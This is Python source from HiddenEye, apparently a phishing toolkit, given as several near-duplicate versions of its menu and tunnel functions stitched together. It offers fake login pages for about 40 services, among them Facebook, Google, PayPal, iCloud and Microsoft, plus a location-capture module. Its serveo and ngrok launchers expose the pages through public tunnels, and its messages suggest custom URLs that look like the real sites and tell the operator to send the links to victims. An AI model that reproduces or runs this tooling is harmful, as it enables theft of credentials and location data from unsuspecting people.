def server_selection(port): # Question where user must select server run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n-------------------------------\n # ) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(localization.lang_server_selection["server_selection"]) print(localization.lang_server_selection["select_any_available_server"]) print_sorted_as_menu(localization.lang_server_selection["servers_list"]) choice = input(global_localization.input_line) choice = choice.zfill(2) if choice == '00': run_command('clear') start_localhost(port) # FIXED elif choice == '01': run_command('clear') start_ngrok(port) # FIXED elif choice == '02': run_command('clear') start_serveo(port) # ALMOST FIXED elif choice == '03': run_command('clear') start_localxpose(port) # DOESN'T GET ENTERED CREDENTIALS BACK elif choice == '04': run_command('clear') start_localtunnel(port, True) elif choice == '05': run_command('clear') start_openport(port) elif choice == '06': run_command('clear') start_pagekite(port) else: run_command('clear') return server_selection(port)
def server_selection(port): # Question where user must select server run_command("clear") print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(localization.lang_server_selection["server_selection"]) print(localization.lang_server_selection["select_any_available_server"]) print_sorted_as_menu(localization.lang_server_selection["servers_list"]) choice = input(global_localization.input_line) choice = choice.zfill(2) if choice == "00": run_command("clear") start_localhost(port) # FIXED elif choice == "01": run_command("clear") # start_ngrok(port) # FIXME replace this shit with MVC NgrokController().close_latest_connection() TerminalController().clear() NgrokController().maintain_default_config() NgrokController().activate_config_path() NgrokController().establish_connection(port=port) print(NgrokController().ngrok_url) elif choice == "02": run_command("clear") start_serveo(port) # TODO ALMOST FIXED elif choice == "03": run_command("clear") start_localxpose(port) # TODO DOESN'T GET ENTERED CREDENTIALS BACK elif choice == "04": run_command("clear") start_localtunnel(port, True) elif choice == "05": run_command("clear") start_openport(port) elif choice == "06": run_command("clear") start_pagekite(port) else: run_command("clear") return server_selection(port)
def server_selection(port): # Question where user must select server run_command("clear") print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(localization.lang_server_selection["server_selection"]) print(localization.lang_server_selection["select_any_available_server"]) print_sorted_as_menu(localization.lang_server_selection["servers_list"]) choice = input(global_localization.input_line) choice = choice.zfill(2) if choice == "00": run_command("clear") start_localhost(port) # FIXED elif choice == "01": run_command("clear") start_ngrok(port) #FIXED elif choice == "02": run_command("clear") start_serveo(port) elif choice == "03": run_command("clear") start_localhostrun(port) elif choice == "04": run_command("clear") start_localtunnel(port, True) elif choice == "05": run_command("clear") start_openport(port) elif choice == "06": run_command("clear") start_pagekite(port) elif choice == "07": run_command("clear") start_localxpose(port) else: run_command("clear") return server_selection(port)
def start_main_menu(): run_command("clear") print(global_localization.hidden_eye_logo) print(localization.lang_start_main_menu["version_by_darksec"]) print(localization.lang_start_main_menu["short_description"]) print(localization.lang_start_main_menu["features_summary"]) print(localization.lang_start_main_menu["down_line"]) print(localization.lang_start_main_menu["attack_vector_message"]) print(localization.lang_start_main_menu["phishing_modules_header"]) print_sorted_as_menu( localization.lang_start_main_menu["phishing_modules_list"]) print(localization.lang_start_main_menu["additional_modules"]) print_sorted_as_menu( localization.lang_start_main_menu["additional_modules_list"]) option = input(global_localization.input_line) option = option.zfill(2) if option == "01": module_loading_message("Facebook") print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["facebook_operation_modes"]) custom_option = input(global_localization.input_line) start_phishing_page("Facebook", custom_option) elif option == "02": module_loading_message("Google") print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["google_operation_modes"]) custom_option = input(global_localization.input_line) start_phishing_page("Google", custom_option) elif option == "03": module_loading_message("LinkedIn") custom_option = "" start_phishing_page("LinkedIn", custom_option) elif option == "04": module_loading_message("GitHub") custom_option = "" start_phishing_page("GitHub", custom_option) elif option == "05": module_loading_message("StackOverflow") custom_option = "" start_phishing_page("StackOverflow", custom_option) elif option == "06": module_loading_message("WordPress") custom_option = "" start_phishing_page("WordPress", custom_option) elif option == "07": module_loading_message("Twitter") custom_option = "" start_phishing_page("Twitter", custom_option) elif option == "08": module_loading_message("Instagram") print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["instagram_operation_modes"]) custom_option = input(global_localization.input_line) start_phishing_page("Instagram", custom_option) elif option == "09": module_loading_message("Snapchat") custom_option = "" start_phishing_page("Snapchat", custom_option) elif option == "10": module_loading_message("Yahoo") custom_option = "" start_phishing_page("Yahoo", custom_option) elif option == "11": module_loading_message("Twitch") custom_option = "" start_phishing_page("Twitch", custom_option) elif option == "12": module_loading_message("Microsoft") custom_option = "" start_phishing_page("Microsoft", custom_option) elif option == "13": module_loading_message("Steam") custom_option = "" start_phishing_page("Steam", custom_option) elif option == "14": module_loading_message("VK") print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["VK_operation_modes"]) custom_option = input(global_localization.input_line) start_phishing_page("VK", custom_option) elif option == "15": module_loading_message("iCloud") custom_option = "" start_phishing_page("iCloud", custom_option) elif option == "16": module_loading_message("GitLab") custom_option = "" start_phishing_page("GitLab", custom_option) elif option == "17": module_loading_message("NetFlix") custom_option = "" start_phishing_page("NetFlix", custom_option) elif option == "18": module_loading_message("Origin") custom_option = "" start_phishing_page("Origin", custom_option) elif option == "19": module_loading_message("Pinterest") custom_option = "" start_phishing_page("Pinterest", custom_option) elif option == "20": module_loading_message("ProtonMail") custom_option = "" start_phishing_page("ProtonMail", custom_option) elif option == "21": module_loading_message("Spotify") custom_option = "" start_phishing_page("Spotify", custom_option) elif option == "22": module_loading_message("Quora") custom_option = "" start_phishing_page("Quora", custom_option) elif option == "23": module_loading_message("PornHub") custom_option = "" start_phishing_page("PornHub", custom_option) elif option == "24": module_loading_message("Adobe") custom_option = "" start_phishing_page("Adobe", custom_option) elif option == "25": module_loading_message("Badoo") custom_option = "" start_phishing_page("Badoo", custom_option) elif option == "26": module_loading_message("CryptoCurrency") custom_option = "" start_phishing_page("CryptoCurrency", custom_option) elif option == "27": module_loading_message("DevianArt") custom_option = "" start_phishing_page("DevianArt", custom_option) elif option == "28": module_loading_message("DropBox") custom_option = "" start_phishing_page("DropBox", custom_option) elif option == "29": module_loading_message("eBay") custom_option = "" start_phishing_page("eBay", custom_option) elif option == "30": module_loading_message("MySpace") custom_option = "" start_phishing_page("Myspace", custom_option) elif option == "31": module_loading_message("PayPal") custom_option = "" start_phishing_page("PayPal", custom_option) elif option == "32": module_loading_message("Shopify") custom_option = "" start_phishing_page("Shopify", custom_option) elif option == "33": module_loading_message("Verizon") custom_option = "" start_phishing_page("Verizon", custom_option) elif option == "34": module_loading_message("Yandex") custom_option = "" start_phishing_page("Yandex", custom_option) elif option == "35": module_loading_message("Reddit") print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["reddit_operation_modes"]) custom_option = input(global_localization.input_line) start_phishing_page("Reddit", custom_option) elif option == "36": module_loading_message("Subitoit") custom_option = "" start_phishing_page("Subitoit", custom_option) elif option == "37": module_loading_message("PlayStation") custom_option = "" start_phishing_page("PlayStation", custom_option) elif option == "38": module_loading_message("Xbox") custom_option = "" start_phishing_page("Xbox", custom_option) elif option == "39": module_loading_message("CUSTOM(1)") custom_option = "" start_phishing_page("CUSTOM(1)", custom_option) elif option == "40": module_loading_message("CUSTOM(2)") custom_option = "" start_phishing_page("CUSTOM(2)", custom_option) """PHISHING MODULES BELOW""" elif option == "0A": module_loading_message("LOCATION") print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization. lang_start_main_menu["additional_module_location_operation_modes"]) custom_option = input(global_localization.input_line) start_phishing_page("LOCATION", custom_option) else: start_main_menu()
def start_main_menu(): run_command("clear") print(global_localization.hidden_eye_logo) print(localization.lang_start_main_menu["version_by_darksec"]) print(localization.lang_start_main_menu["short_description"]) print(localization.lang_start_main_menu["features_summary"]) print(localization.lang_start_main_menu["down_line"]) print(localization.lang_start_main_menu["attack_vector_message"]) print(localization.lang_start_main_menu["phishing_modules_header"]) # phishing_col_width = max(len(word) for row in phishing_modules_list for word in row) + 2 # for row in phishing_modules_list: # print("".join(word.ljust(phishing_col_width) for word in row).format(default_palette[0], default_palette[2])) print_sorted_as_menu( localization.lang_start_main_menu["phishing_modules_list"]) print(localization.lang_start_main_menu["additional_modules"]) # additional_col_width = max(len(word) for row in additional_modules_list for word in row) + 2 # for row in additional_modules_list: # print("".join(word.ljust(additional_col_width) for word in row).format(default_palette[0], default_palette[2])) print_sorted_as_menu( localization.lang_start_main_menu["additional_modules_list"]) option = input(global_localization.input_line) option = option.zfill(2) if option == "01": module_loading_message("Facebook") # customOption = input("\nOperation mode:\n {0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["facebook_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page("Facebook", customOption) elif option == "02": module_loading_message("Google") print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["google_operation_modes"]) # customOption = input( # \n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) customOption = input(global_localization.input_line) start_phishing_page("Google", customOption) elif option == "03": module_loading_message("LinkedIn") customOption = "" start_phishing_page("LinkedIn", customOption) elif option == "04": module_loading_message("GitHub") customOption = "" start_phishing_page("GitHub", customOption) elif option == "05": module_loading_message("StackOverflow") customOption = "" start_phishing_page("StackOverflow", customOption) elif option == "06": module_loading_message("WordPress") customOption = "" start_phishing_page("WordPress", customOption) elif option == "07": module_loading_message("Twitter") customOption = "" start_phishing_page("Twitter", customOption) elif option == "08": module_loading_message("Instagram") # customOption = input("\nOperation mode:\n n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["instagram_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page("Instagram", customOption) elif option == "09": module_loading_message("Snapchat") customOption = "" start_phishing_page("Snapchat", customOption) elif option == "10": module_loading_message("Yahoo") customOption = "" start_phishing_page("Yahoo", customOption) elif option == "11": module_loading_message("Twitch") customOption = "" start_phishing_page("Twitch", customOption) elif option == "12": module_loading_message("Microsoft") customOption = "" start_phishing_page("Microsoft", customOption) elif option == "13": module_loading_message("Steam") customOption = "" start_phishing_page("Steam", customOption) elif option == "14": module_loading_message("VK") # customOption = input( # "\nOperation mode:\n print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["VK_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page("VK", customOption) elif option == "15": module_loading_message("iCloud") customOption = "" start_phishing_page("iCloud", customOption) elif option == "16": module_loading_message("GitLab") customOption = "" start_phishing_page("GitLab", customOption) elif option == "17": module_loading_message("NetFlix") customOption = "" start_phishing_page("NetFlix", customOption) elif option == "18": module_loading_message("Origin") customOption = "" start_phishing_page("Origin", customOption) elif option == "19": module_loading_message("Pinterest") customOption = "" start_phishing_page("Pinterest", customOption) elif option == "20": module_loading_message("ProtonMail") customOption = "" start_phishing_page("ProtonMail", customOption) elif option == "21": module_loading_message("Spotify") customOption = "" start_phishing_page("Spotify", customOption) elif option == "22": module_loading_message("Quora") customOption = "" start_phishing_page("Quora", customOption) elif option == "23": module_loading_message("PornHub") customOption = "" start_phishing_page("PornHub", customOption) elif option == "24": module_loading_message("Adobe") customOption = "" start_phishing_page("Adobe", customOption) elif option == "25": module_loading_message("Badoo") customOption = "" start_phishing_page("Badoo", customOption) elif option == "26": module_loading_message("CryptoCurrency") customOption = "" start_phishing_page("CryptoCurrency", customOption) elif option == "27": module_loading_message("DevianArt") customOption = "" start_phishing_page("DevianArt", customOption) elif option == "28": module_loading_message("DropBox") customOption = "" start_phishing_page("DropBox", customOption) elif option == "29": module_loading_message("eBay") customOption = "" start_phishing_page("eBay", customOption) elif option == "30": module_loading_message("MySpace") customOption = "" start_phishing_page("Myspace", customOption) elif option == "31": module_loading_message("PayPal") customOption = "" start_phishing_page("PayPal", customOption) elif option == "32": module_loading_message("Shopify") customOption = "" start_phishing_page("Shopify", customOption) elif option == "33": module_loading_message("Verizon") customOption = "" start_phishing_page("Verizon", customOption) elif option == "34": module_loading_message("Yandex") customOption = "" start_phishing_page("Yandex", customOption) elif option == "35": module_loading_message("Reddit") # customOption = input( # "\nOperation mode:\nHiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["reddit_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page("Reddit", customOption) elif option == "36": module_loading_message("Subitoit") customOption = "" start_phishing_page("Subitoit", customOption) elif option == "37": module_loading_message("PlayStation") customOption = "" start_phishing_page("PlayStation", customOption) elif option == "38": module_loading_message("Xbox") customOption = "" start_phishing_page("Xbox", customOption) elif option == "39": module_loading_message("CUSTOM(1)") customOption = "" start_phishing_page("CUSTOM(1)", customOption) elif option == "40": module_loading_message("CUSTOM(2)") customOption = "" start_phishing_page("CUSTOM(2)", customOption) # Below Are Tools And Above Are Phishing Modules.. elif option == "0A": module_loading_message("LOCATION") # customOption = input( # "\nOperation mode:\n \n\n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization. lang_start_main_menu["additional_module_location_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page("LOCATION", customOption) else: start_main_menu()
def start_serveo(port): def is_online(): serveo = requests.get("http://serveo.net") if "temporarily disabled" in serveo.text: return False return True def random(port): run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # # ''') print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_random_server"]) # run_command('ssh -o StrictHostKeyChecking=no -o # ServerAliveInterval=60 -R 80:localhost:%s serveo.net > link.url 2> # /dev/null &' % (port)) run_command([ 'ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'ServerAliveInterval=60', '-R', 'localhost:{0}'.format(port), 'serveo.net', '>', 'link.url' ], stdout=DEVNULL, stderr=DEVNULL) wait(8) try: output = check_output("grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") # print("-\n # \n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3} # ".format(default_palette[0], default_palette[4], default_palette[3], port) + url + "{0}".format(default_palette[4])) # print("\n") print(localization.lang_start_serveo["send_this_url_suggestion"]) print(localization.lang_start_localhost["localhost_url"] + '127.0.0.1:' + port) print(localization.lang_start_serveo["serveo_url"] + url + default_palette[4]) except CalledProcessError: wait(4) run_command('clear') return random(port) def custom(port): # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # \n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n # \n # \n{0}Insert a custom subdomain for serveo'''.format(default_palette[0], default_palette[2])) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_custom_server"]) print(localization. lang_start_serveo["make_url_simmilar_to_real_suggestion"]) print(localization.lang_start_serveo["insert_custom_subdomain"]) lnk = input(global_localization.input_line) if not ".serveo.net" in lnk: lnk += ".serveo.net" else: pass # run_command('ssh -o StrictHostKeyChecking=no -o # ServerAliveInterval=60 -o ServerAliveCountMax=60 -R # %s:80:localhost:%s serveo.net > link.url 2> /dev/null &' % (lnk, # port)) run_command([ 'ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'ServerAliveInterval=60', '-o', 'ServerAliveCountMax=60', '-R', '{0}:80:localhost:{1}'.format( lnk, port), 'serveo.net', '>', 'link.url' ], stdout=DEVNULL, stderr=DEVNULL) wait(7) try: output = check_output("grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") run_command('clear') # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0} # \n-------------------------------'''.format(default_palette[0], default_palette[2])) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_custom_server"]) # print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS- # \n{0}[{1}*{0}]{1} Localhost URL: {2}http://127.0.0.1:{3} # \n{0}[{1}*{0}]{1} SERVEO URL: {2}".format(default_palette[0], default_palette[2], default_palette[3], port) + url + "{0}".format(default_palette[4])) print(localization.lang_start_serveo["send_this_url_suggestion"]) print(localization.lang_start_localhost["localhost_url"] + '127.0.0.1:' + port) print(localization.lang_start_serveo["serveo_url"] + url + default_palette[4]) print("\n") except CalledProcessError: # print('''\n !!!\n # !!!\n # !! \n''') print(localization.lang_start_serveo["failed_to_get_domain"]) print(localization.lang_start_serveo["suggestion_to_fix_issue"]) print(localization. lang_start_serveo["you_can_try_to_select_other_domain"]) wait(4) run_command('clear') return custom(port) if is_online: # print(''' # {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} # |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} # | | | ]__| ]__| |__ | \| {0}|__ || |__{1} # {0}http://github.com/darksecdevelopers # {0}** BY:DARKSEC ** \n\n------------------------------- # # # '''.format(default_palette[0], default_palette[2])) print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_url_option_selection"]) print(localization.lang_start_serveo["serveo_phishing_warning"]) print(localization.lang_start_serveo["choose_type_of_url"]) # print(" \n".format(default_palette[0], default_palette[2])) print_sorted_as_menu(localization.lang_start_serveo["url_types"]) choice = input(global_localization.input_line) run_command('clear') if choice == '1': custom(port) elif choice == '2': random(port) else: run_command('clear') return start_serveo(port) else: # print("Serveo is DOWN now, do you want to select another option? Y/n") print(localization.lang_start_serveo["serveo_is_down"]) choice = input("HiddenEye >> ") choice = choice.lower() if choice == 'y': return server_selection(port) else: return start_serveo(port)
def start_serveo(port): def is_online(): try: serveo = requests.get("http://serveo.net", timeout=5) if "temporarily disabled" in serveo.text: return False return True except: return False def random(port): run_command("clear") print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_random_server"]) run_command( [ "ssh", "-o", "StrictHostKeyChecking=no", "-o", "ServerAliveInterval=60", "-R", "localhost:{0}".format(port), "serveo.net", ">", "link.url", ], stdout=DEVNULL, stderr=DEVNULL, ) wait(8) try: output = check_output("grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") print(localization.lang_start_serveo["send_this_url_suggestion"]) print(localization.lang_start_localhost["localhost_url"] + "127.0.0.1:" + port) print(localization.lang_start_serveo["serveo_url"] + url + default_palette[4]) except CalledProcessError: wait(4) run_command("clear") return random(port) def custom(port): print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_custom_server"]) print(localization. lang_start_serveo["make_url_simmilar_to_real_suggestion"]) print(localization.lang_start_serveo["insert_custom_subdomain"]) lnk = input(global_localization.input_line) run_background_command( [ "ssh", "-o", "StrictHostKeyChecking=no", "-o", "ServerAliveInterval=60", "-o", "ServerAliveCountMax=60", "-R", "{0}:80:localhost:{1}".format(lnk, port), "serveo.net", ">", "link.url", ], stdout=DEVNULL, stderr=DEVNULL, ) lnk += ".serveousercontent.com" wait(7) try: run_command("clear") print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_custom_server"]) print(localization.lang_start_serveo["send_this_url_suggestion"]) print(localization.lang_start_localhost["localhost_url"] + "127.0.0.1:" + port) print(localization.lang_start_serveo["serveo_url"] + lnk + default_palette[4]) print("\n") except CalledProcessError: print(localization.lang_start_serveo["failed_to_get_domain"]) print(localization.lang_start_serveo["suggestion_to_fix_issue"]) print(localization. lang_start_serveo["you_can_try_to_select_other_domain"]) wait(4) run_command("clear") return custom(port) if is_online(): print(global_localization.hidden_eye_logo) print(global_localization.official_website_link) print(global_localization.by_darksec) print(global_localization.line_of_dots) print(localization.lang_start_serveo["serveo_url_option_selection"]) print(localization.lang_start_serveo["serveo_phishing_warning"]) print(localization.lang_start_serveo["choose_type_of_url"]) print_sorted_as_menu(localization.lang_start_serveo["url_types"]) choice = input(global_localization.input_line) run_command("clear") if choice == "1": custom(port) elif choice == "2": random(port) else: run_command("clear") return start_serveo(port) else: print(localization.lang_start_serveo["serveo_is_down"]) choice = input("HiddenEye >> ") choice = choice.lower() if choice == "y": return server_selection(port) else: return start_serveo(port)
def start_main_menu(): run_command('clear') print(global_localization.hidden_eye_logo) print(localization.lang_start_main_menu["version_by_darksec"]) print(localization.lang_start_main_menu["short_description"]) print(localization.lang_start_main_menu["features_summary"]) print(localization.lang_start_main_menu["down_line"]) print(localization.lang_start_main_menu["attack_vector_message"]) print(localization.lang_start_main_menu["phishing_modules_header"]) #phishing_col_width = max(len(word) for row in phishing_modules_list for word in row) + 2 #for row in phishing_modules_list: #print("".join(word.ljust(phishing_col_width) for word in row).format(default_palette[0], default_palette[2])) print_sorted_as_menu( localization.lang_start_main_menu["phishing_modules_list"]) print(localization.lang_start_main_menu["additional_modules"]) #additional_col_width = max(len(word) for row in additional_modules_list for word in row) + 2 #for row in additional_modules_list: #print("".join(word.ljust(additional_col_width) for word in row).format(default_palette[0], default_palette[2])) print_sorted_as_menu( localization.lang_start_main_menu["additional_modules_list"]) option = input(global_localization.input_line) option = option.zfill(2) if option == '01': module_loading_message('Facebook') #customOption = input("\nOperation mode:\n {0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["facebook_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page('Facebook', customOption) elif option == '02': module_loading_message('Google') print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["google_operation_modes"]) #customOption = input( #\n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) customOption = input(global_localization.input_line) start_phishing_page('Google', customOption) elif option == '03': module_loading_message('LinkedIn') customOption = '' start_phishing_page('LinkedIn', customOption) elif option == '04': module_loading_message('GitHub') customOption = '' start_phishing_page('GitHub', customOption) elif option == '05': module_loading_message('StackOverflow') customOption = '' start_phishing_page('StackOverflow', customOption) elif option == '06': module_loading_message('WordPress') customOption = '' start_phishing_page('WordPress', customOption) elif option == '07': module_loading_message('Twitter') customOption = '' start_phishing_page('Twitter', customOption) elif option == '08': module_loading_message('Instagram') #customOption = input("\nOperation mode:\n n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["instagram_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page('Instagram', customOption) elif option == '09': module_loading_message('Snapchat') customOption = '' start_phishing_page('Snapchat', customOption) elif option == '10': module_loading_message('Yahoo') customOption = '' start_phishing_page('Yahoo', customOption) elif option == '11': module_loading_message('Twitch') customOption = '' start_phishing_page('Twitch', customOption) elif option == '12': module_loading_message('Microsoft') customOption = '' start_phishing_page('Microsoft', customOption) elif option == '13': module_loading_message('Steam') customOption = '' start_phishing_page('Steam', customOption) elif option == '14': module_loading_message('VK') #customOption = input( # "\nOperation mode:\n print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["VK_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page('VK', customOption) elif option == '15': module_loading_message('iCloud') customOption = '' start_phishing_page('iCloud', customOption) elif option == '16': module_loading_message('GitLab') customOption = '' start_phishing_page('GitLab', customOption) elif option == '17': module_loading_message('NetFlix') customOption = '' start_phishing_page('NetFlix', customOption) elif option == '18': module_loading_message('Origin') customOption = '' start_phishing_page('Origin', customOption) elif option == '19': module_loading_message('Pinterest') customOption = '' start_phishing_page('Pinterest', customOption) elif option == '20': module_loading_message('ProtonMail') customOption = '' start_phishing_page('ProtonMail', customOption) elif option == '21': module_loading_message('Spotify') customOption = '' start_phishing_page('Spotify', customOption) elif option == '22': module_loading_message('Quora') customOption = '' start_phishing_page('Quora', customOption) elif option == '23': module_loading_message('PornHub') customOption = '' start_phishing_page('PornHub', customOption) elif option == '24': module_loading_message('Adobe') customOption = '' start_phishing_page('Adobe', customOption) elif option == '25': module_loading_message('Badoo') customOption = '' start_phishing_page('Badoo', customOption) elif option == '26': module_loading_message('CryptoCurrency') customOption = '' start_phishing_page('CryptoCurrency', customOption) elif option == '27': module_loading_message('DevianArt') customOption = '' start_phishing_page('DevianArt', customOption) elif option == '28': module_loading_message('DropBox') customOption = '' start_phishing_page('DropBox', customOption) elif option == '29': module_loading_message('eBay') customOption = '' start_phishing_page('eBay', customOption) elif option == '30': module_loading_message('MySpace') customOption = '' start_phishing_page('Myspace', customOption) elif option == '31': module_loading_message('PayPal') customOption = '' start_phishing_page('PayPal', customOption) elif option == '32': module_loading_message('Shopify') customOption = '' start_phishing_page('Shopify', customOption) elif option == '33': module_loading_message('Verizon') customOption = '' start_phishing_page('Verizon', customOption) elif option == '34': module_loading_message('Yandex') customOption = '' start_phishing_page('Yandex', customOption) elif option == '35': module_loading_message('Reddit') #customOption = input( # "\nOperation mode:\nHiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization.lang_start_main_menu["reddit_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page('Reddit', customOption) elif option == '36': module_loading_message('Subitoit') customOption = '' start_phishing_page('Subitoit', customOption) elif option == '37': module_loading_message('PlayStation') customOption = '' start_phishing_page('PlayStation', customOption) elif option == '38': module_loading_message('Xbox') customOption = '' start_phishing_page('Xbox', customOption) elif option == '39': module_loading_message('CUSTOM(1)') customOption = '' start_phishing_page('CUSTOM(1)', customOption) elif option == '40': module_loading_message('CUSTOM(2)') customOption = '' start_phishing_page('CUSTOM(2)', customOption) #Below Are Tools And Above Are Phishing Modules.. elif option == '0A': module_loading_message('LOCATION') #customOption = input( # "\nOperation mode:\n \n\n{0}HiddenEye >>> {1}".format(default_palette[0], default_palette[2])) print(localization.lang_start_main_menu["operation_mode"]) print_sorted_as_menu( localization. lang_start_main_menu["additional_module_location_operation_modes"]) customOption = input(global_localization.input_line) start_phishing_page('LOCATION', customOption) else: start_main_menu()